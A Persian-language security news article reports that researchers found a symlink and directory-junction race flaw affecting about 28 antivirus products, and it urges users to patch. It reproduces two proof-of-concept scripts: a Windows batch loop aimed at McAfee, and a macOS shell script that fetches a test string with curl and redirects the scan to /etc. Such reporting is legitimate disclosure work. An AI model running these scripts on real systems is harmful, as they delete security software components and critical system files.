مرکز آپا دانشگاه کردستان

مهاجمان تقریباً از هرگونه نرم‌افزار ضدبدافزار بهره‌برداری می‌کنند و آن‌ها را به ابزارهای مخرب خود تبدیل می‌کنند.

محققان یک نقص ساده را که تقریباً در 28 نرم‌افزار انتی‌ویروس وجود دارد، کشف کردند. این اشکال به نویسندگان بدافزار امکان بهره‌برداری از سیستم و غیرفعال‌کردن نرم‌افزار انتی‌ویروس را می‌دهد، همچنین آن‌ها را به ابزارهایی برای تخریب تبدیل می‌کند. این اشکال از اتصالات دایرکتوری (Windows) و symlinkها (macOS و Linux) استفاده می‌کند و از آن برای انجام این بهره‌برداری استفاده می‌کند. یک اتصال دایرکتوری منحصر به ویندوز است، نمی‌تواند فایل‌‍‌ها را پیوند دهد بلکه فقط می‌تواند دو دایرکتوری را به یکدیگر پیوند دهد و دایرکتوری‌ها نیز باید به سیستم فایل، محلی باشند. هیچ مجوز دسترسی ادمینی برای بهره‌برداری از نرم‌افزارهای انتی‌ویروس که تحت سیستم عامل ویندوز در حال اجرا هستند، لازم نیست. Symlink که با نام پیوند نمادین نیز شناخته می‌‍‌شود و معمولاً در Linux و macOS استفاده می‌شود، نوعی فایل است که به فایل دیگری اشاره می‌کند. در هر دو روش، این اشکال از عملکرد مجوزهای دسترسی به فایل برای غیرفعال‌کردن نرم‌افزار انتی‌ویروس یا تداخل با سیستم‌عامل برای بی‌استفاده کردن آن استفاده می‌کند. اصولاً انتی‌ویروس‌ها با مجوز دسترسی بالا اجرا می‌شوند و از بالاترین سطح دسترسی برای اسکن کلیه‌ی فایل‌ها و دایرکتوری‌ها و یافتن فایل‌های ناشناخته و مخرب به علاوه قرنطینه شده و انتقال به محیط ایزوله‌شده، برخوردارند. با توجه به این عملکرد انتی‌ویروس، طیف گسترده‌ای از آسیب‌پذیری‌ها و شرایط مختلف رقابتی ایجاد می‌شود و سرانجام به مهاجمان این امکان را می‌دهد تا مجوز دسترسی بالایی از سیستم‌های آسیب‌پذیر را بدست آورند. بهره‌برداری و تأثیر کار بهره‌برداری ساده است و نویسندگان بدافزار می‌توانند به راحتی از این نقص بهره‌برداری کنند، اما بسیار هم حساس به زمان و فهمیدن اینکه چه موقع باید اتصالات دایکتوری یا symlink را انجام دهید، است. یک مهاجم محلی که می‌تواند برای افزایش سطح دسترسی تلاش کند، می‌تواند زمان صحیح بهره‌برداری از این نقص را نیز دریابد. مطابق گزارش rack911labs ، "در برخی از نرم‌‌افزارهای انتی‌ویروس که ما بهره‌برداری کردیم، زمان‌بندی به هیچ وجه مهم نبود و یک حلقه ساده در مورد اجرای مداوم کد مخرب برای دستکاری نرم‌افزار انتی‌ویروس جهت تخریب کافی بود." بهره برداری در ویندوز محققان با استفاده از روش گفته شده برای انجام فرآیند بهره‌برداری علیه McAfee Endpoint Security در ویندوز تلاش کردند و موفق‌شدند فایل EpSecApiLib.dll را حذف کنند. محققان گفتند: "در این آزمایش، ما توانستیم فایل‌هایی را که اخیراً مورد استفاده قرار نگرفته نبود از جمله قابلیت مداخله در عملیات ضد ویروس، را حذف کنیم." کد بهره برداری: :loop rd /s /q C:UsersUserDesktopexploit mkdir C:UsersUserDesktopexploit echo X5O!P%%@AP[4PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:UsersUserDesktopexploitEpSecApiLib.dll rd /s /q C:UsersUserDesktopexploit mklink /J C:UsersUserDesktopexploit “C:Program Files (x86)McAfeeEndpoint SecurityEndpoint Security Platform” goto loop بهره‌برداری در macOS و Linux محققان از اکسپلویت علیه Norton Internet Security در macOS استفاده كردند و رشته آزمایشی EICAR را از Pastebin بارگیری كردند تا محافظت آنی را دور بزنند كه منجر به ممانعت انتی‌ویروس از دانلودکردن رشته آزمایشی‌ها می‌شود. همزمان با بارگیری رشته‌آزمایشی‌ها از Pastebin ، انتی‌ویروس بلافاصله آن را به عنوان بدافزار تشخیص داده و اقدام به پاک‌سازی می‌کند. محققان می‌گویند: "ما توانستیم یک تاخیر تقریبی 6-8 ثانیه‌ای را شناسایی کنیم که منجر به ایجاد شرایط رقابت و حمله‌ی symlink میشود و در نتیجه با توجه به اجرای نرم‌افزار بصورت روت، هر فایلی را می‌تواند از بین ببرد." کد بهره‌برداریPoC در: MacOS #!/bin/sh rm -rf /Users/Username/exploit ; mkdir /Users/Username/exploit curl -k https://pastebin.com/raw/jZJ6Ekzt > /Users/Username/exploit/passwd sleep 6 rm -rf /Users/Username/exploit ; ln -s /etc /Users/Username/exploit این PoC بر روی برخی از نرم‌افزارهای ضدویروس لینوکس نیز جواب داد و محققان توانستند فایل‌های مهمی را که نرم‌افزار انتی‌ویروس ارائه داده بود، حذف کنند. کلیه‌ی شرکت‌های آسیب‌دیده‌ی انتی‌ویروس بصورت جداگانه این مورد را تأیید کرده و تقریباً تمام موارد ذکرشده در این صفحه، در حال حاضر وصله شده‌اند. به کاربران توصیه می‌شود وصله‌ی تازه منتشر شده را برای نرم‌افزار انتی‌ویروسی که بر روی رایانه‌ی خود نصب کرده‌اند، اعمال کنند. گردآوری: آزين زارعي